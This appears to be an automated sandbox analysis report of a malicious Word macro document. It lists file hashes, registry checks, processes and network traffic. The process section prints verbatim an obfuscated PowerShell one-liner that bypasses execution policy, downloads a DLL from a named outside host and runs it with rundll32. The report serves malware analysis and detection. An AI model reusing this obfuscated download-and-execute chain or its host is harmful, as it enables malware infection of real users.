C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_data_sections.help.txt

MD5 a33d516fbd7fc781c49ec974d240c8bf
SHA1 858cbb2b5b35b4a0317469d6f691834bb0fb6e09
SHA256 772bf94806392d132b6aef7b2ea62649a77f3ac165158d8dd22dd9e8620d9dbd
SHA512 2888067d9ff8196d4c2525756c58899290a4da832776c1b0b75b898e6f5a3c43b2d038d981cec1856de8842b2a4b90b5c419bbfd35f6e0011132a57b19a55104

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Core_Commands.help.txt

MD5 ba47e8024553dcf2e0accdf9cdcaf8a9
SHA1 aecc05a68c01533a19e667ba35c410010592e5b3
SHA256 de62ff1271b7de9799ca6cc135609e9af95538ee370badc1d607698cfcfbcdda
SHA512 1fa4ada7e88fe9a9c61a38f5f1ceeef44e41a59ea5dfaca3858fbfbcd506c8c33d3db188f5987edf5bdeda4a9a8909061556a91a9f0ca862820ad63d17b3f53d

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Continue.help.txt

MD5 82efcd37b0c24c85afc05b07357d7ad7
SHA1 8656541326be6a21e47c83c318b222b00f7dc582
SHA256 fc6338cf21ba159b85abd24f3243cb28833370719d44edfd28aceba40a3e7aee
SHA512 60778c599c141a11d429acf540cd7aee2c745a189c1a596403aca9e3851e5b71be1573c22f947364e1c0564da976878de0f8b5ce8256795f47cdec3ef1e8f93c

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Comparison_Operators.help.txt

MD5 02cb964baa087eef002abee9fe44b737
SHA1 f0984de65b88a05a587f73a65390bec75f525893
SHA256 c9ed776cb3db4aee63bad4241b924331535734383819864d5e3dacd3f13ce966
SHA512 b8b1aac40532ba210b1a3063a4157a31f633606415beccdafcadb440924a45678d20c91308aab65e99e73a1e265548dcc682e87b0cd9481aee5e40a386a9d3ce

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_CommonParameters.help.txt

MD5 fbe14cf1b768d59274268a2f2be325d6
SHA1 927a2c41c33fe6e2a11123572f7006513f61d238
SHA256 73e4622de52a79256a31a9106c6bde06f504d947bba4c9447659d0c5bae29bc0
SHA512 994dd644b4de9ba096c25869d0ec7b2515e619312f8c12d433fa4dee2ed5d80ab29c5483b73fb5353f4e6a00104805c1d29d026e4f6ca3c52a71b0d8b66f1db4

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Comment_Based_Help.help.txt

MD5 009b7ec3fd8f6c5daad1ab8f873915b6
SHA1 bca72d30c853f8ac9786fee63dbfc920c2a137e4
SHA256 430f02362331f401c42b01e1e5db75aace1dd21cf284eca9c75d7f3ce5887317
SHA512 f20f440fa5318c1d003e1412475a941a34c38e4c35ff2cf2f5e307d0aaedc558afed0dfda3da73c50d59533b295eb07d9e18b950cfe8df346c40613d750bcf5e

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Command_Syntax.help.txt

MD5 ffd244fc1f06b51c996b5a6872320423
SHA1 740900b06bc02dfc5c6021e73ea77efd4b96f30f
SHA256 91eeabb4ed7c2ec5871c9687ca9d2e9c95d0fdf1235dd2458da2503223d5b0f2
SHA512 34c8b5acc1fa2dcf7708238c5778591c421e8eac724c9d63dbe2b83d4184812a64d97a0bcf0aebf4128d88da6c11aad7cd383c7a4f96fcf4b3d2b6b52de853b1

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_command_precedence.help.txt

MD5 506751f802c30165339fbe9f6ded6bdb
SHA1 128f8f92eac5ccbb746122ee084c3f94a134cee1
SHA256 a9a9eeb12ac7959dbe46322ab40fe4794be936d4a4b9ecfc1a9e7e6c93feaf9f
SHA512 a14fccddb1682af9a2a6c8d1e739d4416ee4f5c2ed816b0e480946e6b8ddbc69b7c408fb3309e06c5c8f049142558ef4402d98eafbb3b35d3a0ba9075f3ae445

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Break.help.txt

MD5 710ff8a9e47e741f5d09c82ffcae3057
SHA1 2308e17617a45716e1664b591fab17227630f6b2
SHA256 3c4bd767e1e9027c5f8fa7f2717bc3a32fe71cc808c3b53fcf0eff3fa62fdcc3
SHA512 2624b4b7b784043e4cbfe5bb51292998d276aaa75366906b571f8d66c9408352726d65ee2e78e92d58db247037a0d4d48199c3a442977404568aaa43874a1aca

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Automatic_Variables.help.txt

MD5 2060451a52f4a9083f0f554492d7b261
SHA1 346ba51823c9b0a67cbc0509adfe789b7b681a0d
SHA256 5a16ce4adf1b862edf7bd253e66bfc125cd79b227729f5a0522a84d37f004858
SHA512 3ac42e061aa4c104a05e24d54d256fbfb702f43d4f4bcb8b84db13f626320779f5ecb865b515a8af00b0220b5cab1c4db7ddd97c8265c4bec68655f4426138c7

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Assignment_Operators.help.txt

MD5 b335d7490dd7429bd096fee82a807008
SHA1 167d0d8543f818425cefc25865b978de906aa301
SHA256 1b669af68a8743144b0a2812471afd504cef88b449d91e2c2d5c58cce98328f6
SHA512 c1eaa81c5ef42a6de736bcc2195fb82f0b37638ec84d1f6a421417fa87eebd0418fc642446f3cf3c831b36fbaac97d530d7e36de8ee5b47a8bd1397e0b7b022a

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_arrays.help.txt

MD5 253b0f328ce98fb2d89f4de1a093df1a
SHA1 1f0a9729416fce3a216ad2e74d695fcc175ea707
SHA256 907593a534706387725101cc8eeeef44d0df4de22a90f17789055769e103004f
SHA512 838dfa89927ce6112aba361fd3b13f5b283f07038f17b3a7355fd8ba87fc8c2c03fe3c8ab2a239dd78231b18ae197e3ea4c7ef9d26ddea17dfef0533967638de

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Arithmetic_Operators.help.txt

MD5 d29f635492b5b2f98d7623284899b1aa
SHA1 5db4c47cc44f17848b80029d8a8348cef7a5dc56
SHA256 8d5de2726faeb445042196cfd80b132bf5adb2c87241f42a29c88e9d75fcb759
SHA512 923d2fd2f82dda05f63d3a8ab7b091dd4a8ff5b5404171bdebc96f0401bf3d84334f0d9b6f43495656f6a7997c194ce58046d20ef31d8e24e7bb056f961a2f11

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_aliases.help.txt

MD5 8f461cb12c72a2704845e509ed06c858
SHA1 554b6c81fb67569f1dbb5a0423d113a7d0f9a57c
SHA256 12898e59ef4f1e6729d79ba022883a7e6f088447767a02e8534e11f04424d644
SHA512 b5d065f46540f7c3087dc613cfa1026da249a19f669b354bf3caa035c58e44f6ba335ee7075877d404f9d539584c8c3a63c6cceafce2d80df986fea7399bdbba

memory/2284-745-0x0000000070B8D000-0x0000000070B98000-memory.dmp

memory/2284-746-0x0000000000450000-0x0000000000550000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 971725ce794c620315c14c3f81237595
SHA1 65db3fbac64d4dd5689f130de853ff3c5059c280
SHA256 3a556c634df4b0aa3ad41133d0afa3fc488b88a7f9cb50a1cb329dfd96f5cb4e
SHA512 d0dbcb64f331a215d993ca32841888d5cf50414540d18d0630c6d1e9498c36c1d4c9ef253b4e6d9760cfbb2cf7a9a579c85fed9b48c644f49550e18ab44266a6

memory/2284-761-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2284-762-0x0000000070B8D000-0x0000000070B98000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-20 04:19

Reported

2024-05-20 04:22

Platform

win10v2004-20240508-en

Max time kernel

145s

Max time network

127s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc" /o ""

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc" /o ""

C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe

C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe $oaibfxvjiowlxxw_iekfpfyiuuoycid='org/CJ';$natpxmhofkbbeb_huseueei='ojqa';$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz='e]$ojqa0';$mdroaenb_esuwo='ient).';$wvmbvwoxkjuhjt='($env:a';$mzoiuddeyajlqncmnrvpotqghzbopauau='($';$tcozygiwfcyinfvnu_euqaocnlecylzi='br';$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf='+ ''';$aoauapzujgioje_xidu_aaibeabsc87='.php';$okeygvmueodiuuyuz='Net';$yitmzuozoufzu_lficf_gdhpoeuqao2='$env:t';$sgagyyoabqaaaioi='k;}}Se';$cfruonrvvuhve_ixrbnpdclveyouklainlriu=' $path=';$aooajmeeiyupyyusaqxznw='Downl';$yamzywruogbpvbyuunmq97=' -Sc';$mwyzyn_vhaa_gzewtucmxgu='a+''\';$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz='ea';$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki=''',$pat';$vbsif_aeknkgtcrajatpyktombewksswo='t-';$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es='%s';$ua_wybbegalseqrkkigmuueik='rmat ';$bxauxi_gdiqlvelokehc=');(Ne';$iu_ebbubieeuynqayu_rcpfykziuepqojd02='.Webcl';$ubgieohxfasnveuauyunvnyyafalf_tuf='ct S';$rlhio_vzhdxeytzwdajcaio='lcn';$c_qwtnvmm_mwitcyidseg=') -';$uymddyuwrfj_truyyqv=' = $';$ieaetbrqnosgobb='xeofiu''';$ulhqbioxuairmxscoeywdo='\g';$iiqjwpysluziyi='h); rund';$fm_lzloaflyqunl_rrvjpmd=' Ge';$kayrdaavkijoqmiiieadeowqbw='oad';$s_bvcqmepdogzwmoqwr_uscmigyassarl='; $qgyx';$uso_dl_vwzkeeskgpp_ibvewjmr='uCokZbLZ';$atke_aahgy_awuhinj_yarqjoiagbdomxcm='Ex';$ytr_ulakmoxieyuuqsa='ope P';$wmqaligua_xjensemze='le(';$uziux_cxljaau='olic';$qdkp_tslelwso_iuwnaby_np='11;whi';$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5='ate -UFo';$oauwfabx_dhpjo_iodh_ulpunmfktuavteai=' ''f1'';Re';$wtoxtvoiougt_y='re';$byadiryyayieeidgqqmjrgeactagkrpexhu='emp ';$bqgddecgsiiajzoourpmbdeayguxj='cur';$sq_aqnpeltdkhy_idwjrpgmqq_ufzty='et-Da';$ijfkefmziiwkqqxy='shops.';$ydndgjo_eeopr_fdjdezhomjqqeyeeyeyu_qb='File(''';$idrypqufftaiazps='yste';$egxtowvvxgkzyeykhonizpgwa_rjoeuanpo=' $path ,';$fsyy_cy_ydewla_a_yeifzavusld_e='ll32';$txjyexcuyf_moyzdaaylgqru='ecutionP';$aef_noyxiax_puskee='ad = G';$brraekqxipsc_u='m 4';$acgyap_iqwholxtyekmd_xoayczaumoao='0 + 11.';$tmi_hibeeyaxhueiswapcwr='y Bypass';$e_utyoesneikpukijvwxeamahf_ii='t-D';$gdzgogct_uzouwzezekvialzuqoi='ase.dll''';$uy_aywtlioixpgipyixqufajvjnfk_a='et';$kzfwuwzbhtztiihor_rhaiscfboclhe='77;if';$qpb_elgvzsl_iqmfch='lcnad -g';$kgeyoiapuoiutzvlkft_f_bnbmioasyv='eep -';$uiieeutyymuyscizu62='){';$cnyjzkyeff_uobpdkcas='t-Sl';$ei_oefjuuyalgvsyjxnewacxtxr='tem (';$iivobpybzsthaoopoisugotiiiieduhhr08='rmat';$jptjeey_kzmhoaosrugpervewfwzsvvs='[doubl';$xknnmepjaanpebhypu='ppdat';$igeoekzbisdoztezqosdyeuokg='1){ $';$vxzopznvaorxujcbx='te -UFo';$p_lmbqvpyzegfzwimu='w-Obje';$pstxzidydhkykpkknua='m.';$ieenx_au_yycve_svmhohfeaxessifksygx='se -forc';$alfwlkamnera=' %s;Star';$ao_mbuayqujiyyapwsniiue='move-I';$wcfdjjedlijj0='//groovy';$somgplgrotbymcrajk_y='e;';$yagwueilv_uavozttcstoizd_vlvgm_ia_uvjhahrp='rocess;';$lzbwawc_sfiygjoyuucrzy_aii='http:';$auijlrquyuonww_xotmtfapkxbzyaoeea64='e $qgyx'; Invoke-Expression ($jptjeey_kzmhoaosrugpervewfwzsvvs+$eikoia_yblegbmybniemxea_ogwepz+$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4+$fm_lzloaflyqunl_rrvjpmd+$e_utyoesneikpukijvwxeamahf_ii+$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5+$ua_wybbegalseqrkkigmuueik+$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es+$s_bvcqmepdogzwmoqwr_uscmigyassarl+$uymddyuwrfj_truyyqv+$natpxmhofkbbeb_huseueei+$acgyap_iqwholxtyekmd_xoayczaumoao+$qdkp_tslelwso_iuwnaby_np+$wmqaligua_xjensemze+$igeoekzbisdoztezqosdyeuokg+$rlhio_vzhdxeytzwdajcaio+$aef_noyxiax_puskee+$sq_aqnpeltdkhy_idwjrpgmqq_ufzty+$vxzopznvaorxujcbx+$iivobpybzsthaoopoisugotiiiieduhhr08+$alfwlkamnera+$cnyjzkyeff_uobpdkcas+$kgeyoiapuoiutzvlkft_f_bnbmioasyv+$brraekqxipsc_u+$kzfwuwzbhtztiihor_rhaiscfboclhe+$mzoiuddeyajlqncmnrvpotqghzbopauau+$qpb_elgvzsl_iqmfch+$auijlrquyuonww_xotmtfapkxbzyaoeea64+$uiieeutyymuyscizu62+$tcozygiwfcyinfvnu_euqaocnlecylzi+$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz+$sgagyyoabqaaaioi+$vbsif_aeknkgtcrajatpyktombewksswo+$atke_aahgy_awuhinj_yarqjoiagbdomxcm+$txjyexcuyf_moyzdaaylgqru+$uziux_cxljaau+$tmi_hibeeyaxhueiswapcwr+$yamzywruogbpvbyuunmq97+$ytr_ulakmoxieyuuqsa+$yagwueilv_uavozttcstoizd_vlvgm_ia_uvjhahrp+$cfruonrvvuhve_ixrbnpdclveyouklainlriu+$wvmbvwoxkjuhjt+$xknnmepjaanpebhypu+$mwyzyn_vhaa_gzewtucmxgu+$uy_aywtlioixpgipyixqufajvjnfk_a+$gdzgogct_uzouwzezekvialzuqoi+$bxauxi_gdiqlvelokehc+$p_lmbqvpyzegfzwimu+$ubgieohxfasnveuauyunvnyyafalf_tuf+$idrypqufftaiazps+$pstxzidydhkykpkknua+$okeygvmueodiuuyuz+$iu_ebbubieeuynqayu_rcpfykziuepqojd02+$mdroaenb_esuwo+$aooajmeeiyupyyusaqxznw+$kayrdaavkijoqmiiieadeowqbw+$ydndgjo_eeopr_fdjdezhomjqqeyeeyeyu_qb+$lzbwawc_sfiygjoyuucrzy_aii+$wcfdjjedlijj0+$ijfkefmziiwkqqxy+$oaibfxvjiowlxxw_iekfpfyiuuoycid+$uso_dl_vwzkeeskgpp_ibvewjmr+$aoauapzujgioje_xidu_aaibeabsc87+$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki+$iiqjwpysluziyi+$fsyy_cy_ydewla_a_yeifzavusld_e+$egxtowvvxgkzyeykhonizpgwa_rjoeuanpo+$oauwfabx_dhpjo_iodh_ulpunmfktuavteai+$ao_mbuayqujiyyapwsniiue+$ei_oefjuuyalgvsyjxnewacxtxr+$yitmzuozoufzu_lficf_gdhpoeuqao2+$byadiryyayieeidgqqmjrgeactagkrpexhu+$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf+$ulhqbioxuairmxscoeywdo+$ieaetbrqnosgobb+$c_qwtnvmm_mwitcyidseg+$wtoxtvoiougt_y+$bqgddecgsiiajzoourpmbdeayguxj+$ieenx_au_yycve_svmhohfeaxessifksygx+$somgplgrotbymcrajk_y);

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\etase.dll f1

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 groovyshops.org udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
NL 23.62.61.184:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 184.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.200:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 200.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/4984-0-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp

memory/4984-2-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp

memory/4984-3-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp

memory/4984-4-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp

memory/4984-1-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp

memory/4984-5-0x00007FFCC6CED000-0x00007FFCC6CEE000-memory.dmp

memory/4984-6-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-7-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-10-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-12-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-11-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-13-0x00007FFC848A0000-0x00007FFC848B0000-memory.dmp

memory/4984-9-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-8-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-14-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-15-0x00007FFC848A0000-0x00007FFC848B0000-memory.dmp

memory/4984-16-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-18-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-17-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-20-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-19-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-35-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-44-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-62-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\NetSecurity\it\Microsoft.Windows.Firewall.Commands.Resources.dll

MD5 d8fbcf4494a827061d390a8b26f30946
SHA1 c707a5f072498a3d2c09ba026cf46bcc48245f64
SHA256 d763a02a6b08ad1a4c0b5d4cebe6840e425bb69cffe084c27874386be5366572
SHA512 0280e212b957d42b507e0f71651c7c061b44cca977af4f0f135fe6fe4129ee4e0caf9323539b7c459875cd00ccd7f214dad99bbbff99bfc10dc4365f6aad885e

memory/4984-1005-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4984-1007-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/4944-1008-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4944-1009-0x0000022121080000-0x00000221210A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcwpxkz3.btp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\default.help.txt

MD5 56b0b822141c6493d168c2f4a6c00ea2
SHA1 37211f21dcf7a8fe4d4e5fdf0004a01436b9a84d
SHA256 80ba892518ce815e29b8700f0c0a0115bccd469a5f9a1fee844d667c2d638018
SHA512 f59d83b892f357329bc4a78b8e6b934ae9cd92196bc5c0ff60d28f6948fe0d6ad503d013585e164288e066293bf240b3859ae0f5e0b6974572a3e1849913b8a4

C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\PSEvents.dll.mui

MD5 8d729ac5f427b0ce0242344ee8e59474
SHA1 12374374e8bf61eb844c369402dfa4578ed29c4d
SHA256 d35cf4aac422469e58f5abfdd88fcddef53d4cf2fa584542983f44cefbe5cfbe
SHA512 590cb080f8bc7d4a6bdf3e7e33b8467b167a91eab9afeff30da235f93bfdc12eae7be02277e365676434b3894dad8ac1f6f1825dbabf9830528f574c28f8b84e

C:\Users\Admin\AppData\Local\Temp\gxeofiu\it-IT\default.help.txt

MD5 ec4843a62db92a8bf7704a6904ec1122
SHA1 2b867b9a1c0c117837c2e5a111046c4b48627f80
SHA256 f14fe348f03a3fe75116ab7934c1035af3917bf43853ecd521297f08dc9dab34
SHA512 58d5e7bd6584d9b4d5dccdbf324db0d51787abbb64140096ba9f345e92098778cc3fb0b09a37f2a0e3c8470ad58a29ba44b2b73d3885b6dcf2bb4d8278d12808

C:\Users\Admin\AppData\Local\Temp\gxeofiu\fr-FR\pwrshmsg.dll.mui

MD5 ee0eda7d43efe27c19e920194ba7139b
SHA1 00bde8975ccec9cd676be93746911231a0ace27e
SHA256 1b1397789866e7353e5dadc7cd28deab2ac21ffae78049141307b2e895845ff5
SHA512 66224ae6e246ae7d340be12db524d639eb1e061211e1c934d5046ca8c70f641beefb996e61cef449f2bd979c53b38fcc577a3a6175974e8f4de52dc76075eb7d

C:\Users\Admin\AppData\Local\Temp\gxeofiu\fr-FR\pspluginwkr.dll.mui

MD5 7aaba5ddc3f3eb071f9f4bc3a2d5adf0
SHA1 542e86f0eb24be1bdae02112afd15f4bbd0a2e3c
SHA256 582906965b32db51d4180a4248ff77f7de42cf7beb86898ad117699757483c4f
SHA512 c8ac3214be77e039d761860c56ed5bd9423641fa2ca9adf92ec6b97bdfe7f7246f91ae7a1c549dab14789a6482afd259bfc9a6550d11c50cbc84f5ce23a7e202

C:\Users\Admin\AppData\Local\Temp\gxeofiu\fr-FR\PSEvents.dll.mui

MD5 59d5730040954df85e0c53b61f6df85f
SHA1 cd3a45acaaf1f4a70bfeca7d2d97cff5af257b4c
SHA256 45ddf1551821543f7041bf9c00ebca4209ebb1582380ea5d17a8a166dae3f673
SHA512 6f454fe4f8b5aeb36ef4a7267da31ec58f6c35c333a93efae5b191fe29d5f241e506f590a65f6bd8763f6b79029e3569322f3369d868bbd779d5dd41aaeca1fa

C:\Users\Admin\AppData\Local\Temp\gxeofiu\fr-FR\powershell.exe.mui

MD5 ba1f9a7d3c941e50845c590709cbd55e
SHA1 e8d3e271749a7b576a249e60c07d02c7c3c813fa
SHA256 82301271c95e2043620e5d6c441e0edae10e9704c1051416b20ba329a2435dbf
